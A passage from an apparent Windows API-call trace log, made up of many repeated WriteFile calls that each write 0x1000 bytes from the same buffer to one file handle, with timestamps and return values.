lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.861] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.861] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.862] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.862] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.862] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.863] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.863] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.863] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.864] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.864] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.864] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.864] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.865] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.865] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.865] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.866] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.866] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.866] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.867] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.867] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.867] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.868] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.868] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.868] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.869] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.869] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.869] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.869] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.870] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.870] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.870] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.871] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.871] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.871] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.872] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.872] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.872] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.873] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.873] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.873] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.873] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.874] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.874] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.874] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.875] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.875] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.875] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.876] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.876] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.876] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.877] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.877] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.877] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.878] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.878] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.878] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.879] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.879] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.879] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.879] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.881] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.881] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.882] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.883] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.883] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.883] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.884] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.884] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.884] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.884] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.885] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.885] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.885] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.885] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.886] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.886] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.886] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.886] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.887] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.887] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.887] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.888] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.888] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.888] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.888] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.890] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.890] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.890] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.890] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.891] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.891] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.891] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.892] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.892] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.892] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, 